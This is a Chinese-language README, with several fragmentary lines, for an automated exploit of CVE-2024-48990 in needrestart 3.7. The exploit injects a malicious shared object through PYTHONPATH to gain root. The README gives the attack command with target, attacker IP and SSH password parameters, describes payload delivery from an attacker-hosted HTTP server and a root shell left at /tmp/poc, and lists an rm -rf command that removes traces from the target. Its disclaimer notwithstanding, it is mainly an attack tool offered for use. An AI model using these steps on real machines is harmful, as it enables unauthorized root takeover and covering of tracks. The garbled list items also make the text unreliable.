本工具可自动利用 needrestart 3.7 版本中的一个权限提升漏洞,该漏洞编号为 CVE-2024-48990。
它通过利用 needrestart 扫描 Python 进程时对 PYTHONPATH 环境变量的不安全使用,实现 root 权限执行。
该漏洞利用工具的工作原理如下:
__init__.so),该对象会在导入时被触发。.so 文件。PYTHONPATH 环境。importlib。needrestart,它会继承被篡改的 PYTHONPATH,加载恶意模块,并以 root 身份执行载荷。/tmp/poc),从而允许获取 root shell。在攻击机上运行漏洞利用工具:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
参数说明:
needrestart 3.7 版本要从目标主机上移除漏洞利用痕迹:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect(pip3 install pexpect)gcc(用于编译载荷)python3 -m http.server(脚本会自动启动)needrestart 版本(v3.7)/usr/sbin/needrestart 具有 sudo NOPASSWD 权限curl本工具仅用于教育和授权安全测试目的。 请勿在非您所有的系统上使用,或未经明确许可使用。